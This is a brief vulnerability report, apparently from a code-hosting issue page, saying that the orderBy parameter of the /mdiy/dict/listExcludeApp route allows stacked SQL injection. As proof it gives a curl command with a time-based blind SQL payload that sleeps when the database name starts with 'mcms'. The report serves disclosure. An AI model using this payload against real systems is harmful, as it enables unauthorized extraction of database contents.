代码拉取完成,页面将自动刷新
/mdiy/dict/listExcludeApp路由的orderBy参数存在堆叠SQL注入
证明
curl -w "%{time_total}\n" -i -I -X $'GET' $'http://127.0.0.1:8080/mdiy/dict/listExcludeApp?dictType=1&orderBy=1;select/**/if(substring((select/**/database()),1,4)=\'mcms\',sleep(3),1);'